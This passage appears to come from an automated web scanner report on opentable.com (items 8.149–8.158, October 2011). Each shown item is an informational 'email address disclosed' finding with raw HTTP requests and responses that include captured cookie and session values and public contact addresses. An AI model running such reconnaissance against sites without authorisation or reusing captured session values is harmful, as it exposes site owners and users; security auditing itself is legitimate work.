The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/restjoinus/whitedots_278.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 236
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:02 GMT

GIF89a.......................................................................................................!.......,..........i.".d)Z.....$
"..Q.....`.......l8.....^.Y....~...(EV.X'1z.*.M..8MZ..!..=
...[SNIP]...

8.149. http://www.opentable.com/interim.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=0&hr=http://www.grandcafe-sf.com/&tp=136; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Vary: Accept-Encoding
Content-Length: 5566


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head><meta http-equiv="content-type" content="text/html; chars
...[SNIP]...

8.150. http://www.opentable.com/irp/jquery/js/ScriptHandler.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /irp/jquery/js/ScriptHandler.ashx

Issue detail

The following email address was disclosed in the response:

Request

GET /irp/jquery/js/ScriptHandler.ashx?f=jquery&z=true HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 71803
Content-Type: application/javascript; charset=utf-8
Expires: Wed, 02 Nov 2011 12:55:09 GMT
Last-Modified: Fri, 23 Sep 2011 02:14:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Date: Mon, 03 Oct 2011 12:55:09 GMT

(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):
...[SNIP]...

8.151. http://www.opentable.com/ism/thickbox.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /ism/thickbox.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ism/thickbox.css HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 200 OK
Content-Length: 2770
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:28 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:40 GMT

#TB_window{font:12px Arial,Helvetica,sans-serif;color:#333;z-index:99999999!important;}#TB_secondLine{font:10px Arial,Helvetica,sans-serif;color:#666;}#TB_window a:link{color:#666;}#TB_window a:visite
...[SNIP]...

8.152. http://www.opentable.com/ism/thickbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /ism/thickbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ism/thickbox.js HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 200 OK
Content-Length: 9452
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:46 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:41 GMT

var tb_pathToImage="";if(document.location.protocol=="https:")tb_pathToImage="https://secure.opentable.com/info/restaurateurs/img/loadingAnimation.gif";else tb_pathToImage="http://www.opentable.com/in
...[SNIP]...

8.153. http://www.opentable.com/jaspers-corner-tap-and-kitchen  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jaspers-corner-tap-and-kitchen

Issue detail

The following email addresses were disclosed in the response:

Request

GET /jaspers-corner-tap-and-kitchen?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:50 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&vbefres=1&vbefreg=1&js=0&m=4&restref=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&vbefres=1&vbefreg=1&js=0&m=4&restref=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: jslt=DhNUH7QEwV0b0tKkwEp2937edj1JsmX2; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 199696


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns
...[SNIP]...
<A href=mailto:info@jasperscornertap.com>info@jasperscornertap.com</a>
...[SNIP]...

8.154. http://www.opentable.com/jscripts/ScriptHandler.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/ScriptHandler.ashx

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/ScriptHandler.ashx?f=jquery&z=true HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 71803
Content-Type: application/javascript; charset=utf-8
Expires: Wed, 02 Nov 2011 12:53:41 GMT
Last-Modified: Fri, 23 Sep 2011 02:14:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Date: Mon, 03 Oct 2011 12:53:40 GMT

(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):
...[SNIP]...

8.155. http://www.opentable.com/jscripts/common93.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/common93.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/common93.js?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 5727
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:00 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:52 GMT

window.onerror=null;function swap(imgname,imgB){document[imgname].src=imgB}function printPage(){if(window.print)window.print()}function setCookie(name,value){var curCookie=name+" = "+escape(value);doc
...[SNIP]...

8.156. http://www.opentable.com/jscripts/imgCalendar_intl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/imgCalendar_intl.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/imgCalendar_intl.js HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 18882
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:51 GMT

var pInputMonth;var pInputDay;var pInputYear;var today=new Date;var javaDate=today;var year=today.getFullYear();var javaYear=year;var month=today.getMonth();var javaMonth=today.getMonth();var inputDat
...[SNIP]...

8.157. http://www.opentable.com/jscripts/jcarousellite.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/jcarousellite.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /jscripts/jcarousellite.js HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 14322
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:10:00 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:54 GMT

/**
* jCarouselLite - jQuery plugin to navigate images/any content in a carousel style widget.
* @requires jQuery v1.2 or above
*
* http://gmarwaha.com/jquery/jcarousellite/
*
* Copyright
...[SNIP]...
llbacks. The functions will be passed an argument that represents an array of elements that
* are visible at the time of callback.
*
*
* @cat Plugins/Image Gallery
* @author Ganeshji Marwaha/ganeshread@gmail.com
*/

(function($) { // Compliant with jquery.noConflict()
$.fn.jCarouselLite = function(o) {
o = $.extend({
btnPrev: null,
btnNext:
...[SNIP]...

8.158. http://www.opentable.com/jscripts/lib/thirdparty/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/lib/thirdparty/prototype.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/lib/thirdparty/prototype.js?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
